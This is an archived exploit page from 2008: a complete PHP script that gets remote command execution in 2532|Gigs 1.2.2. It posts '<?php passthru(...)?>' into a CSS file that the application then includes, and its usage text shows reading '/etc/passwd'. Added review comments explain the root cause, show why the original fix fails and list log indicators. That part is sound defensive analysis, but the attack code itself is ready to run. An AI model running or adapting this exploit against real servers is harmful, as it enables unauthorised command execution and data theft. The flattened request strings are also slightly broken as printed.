
2532-exec.txt

Posted on 22 December 2008

<?php
/*
 * ----------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit
 * ----------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * works regardless php.ini settings
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ----------------------------------------------------------------
 * Code Details (calcss_edit.php)
 *
 *  1. <?php
 *  2. ...
 * 12. sleep(2);
 * 13. $id = $_POST["id"];
 * 14. $content = $_POST["content"];
 * 15. //lets write the updated CSS file
 * 16. $filename = "css/calendar.css";
 * 17. $theText = stripslashes($content);
 * 18. $data = fopen($filename, "w");
 * 19. fwrite($data,$content);
 * 20. fclose($data);
 * 21. // display the new css file
 * 22. include("css/calendar.css");
 * 23  ?>
 * ----------------------------------------------------------------
 * Fix
 *
 * <?php
 *
 * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF']))
 * {
 *   die("Access Not Allowed");
 * }
 *
 * ...
 * ?>
 *
 * ----------------------------------------------------------------
 * NOTE(review) - root cause, as shown by the excerpt above:
 *   Lines 13-22 of calcss_edit.php take $_POST["content"], write it to
 *   css/calendar.css and then include() that same file. include() runs
 *   any PHP tags it finds, so request data ends up being executed.
 *   Line 19 writes the raw $content; the stripslashes() result in
 *   $theText (line 17) is never used. No authentication check appears in
 *   the quoted lines; lines 2-11 are elided, so confirm against the full
 *   file.
 *
 * NOTE(review) - the "Fix" above should not be relied on:
 *   - $_SERVER['PHP-SELF'] is not a key PHP populates (the variable is
 *     PHP_SELF), so the condition as written never matches.
 *   - eregi() was deprecated in PHP 5.3 and removed in PHP 7.0.
 *   - Even with both corrected, a script-name check only refuses direct
 *     requests; it does not address the write-then-include pattern. If
 *     the script is the edit form's POST target (not shown here), it
 *     would also disable the feature for legitimate users.
 *   A durable remediation is to require an authenticated, authorised
 *   session (plus a CSRF token) before the write, and to emit the
 *   stylesheet with readfile() or as a static file instead of include().
 *
 * NOTE(review) - what a defender can look for:
 *   - POST requests to calcss_edit.php in web-server logs, particularly
 *     ones not tied to an administrator session.
 *   - a PHP open tag inside css/calendar.css.
 *   - the hard-coded User-Agent "Lynx (textmode)" sent below; it is
 *     trivially changed, so treat it as a weak indicator only.
 *
 * The string literals below are reproduced exactly as they appear on the
 * page; whitespace inside them appears to have been flattened when the
 * page was extracted.
 */

// Silence every PHP diagnostic for the rest of the run.
error_reporting(0);

// argv[1] is given as "host/path": index 0 is the host, index 1 the first path segment.
$host = explode('/',$argv[1]);
// `or` binds more loosely than `=`, so usage() runs when argv[2] is missing or falsy.
$exec = $argv[2] or usage();
// Plain TCP connection to port 80 of the host; the return value is not checked.
$sock = fsockopen($host[0],80);
// Form body: the `content` parameter that calcss_edit.php writes to css/calendar.css and then includes.
$post = "content=<?php passthru('{$exec}');?>";
// Byte length of the body, used for the Content-Length header.
$leng = strlen($post);
// Request text: a POST to calcss_edit.php under the supplied path, with static headers.
$data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1 ".
        "Host: {$host[0]} ".
        "User-Agent: Lynx (textmode) ".
        "Content-Type: application/x-www-form-urlencoded ".
        "Accept-Encoding: text/plain ".
        "Content-Length: {$leng} {$post} ";

fputs($sock,$data);

// Read the response until EOF. $html is never initialised; the resulting
// notice is hidden by error_reporting(0) above.
while(!feof($sock)) {
    $html .= fgets($sock);
}
fclose($sock);

// Print whatever the server returned.
echo $html;

/*
 * Prints the banner and usage text, then exits with status 0.
 * Declared after its call site; PHP hoists top-level function declarations.
 */
function usage() {
    print_r(' ------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ------------------------------------------------------- by athos - staker[at]hotmail[dot]it works regardless php.ini settings Usage: php xpl.php [host/path] [command] php xpl.php localhost/cms cat ../../../etc/passwd php xpl.php localhost/cms "uname -a" ');
    exit(0);
}
?>

 
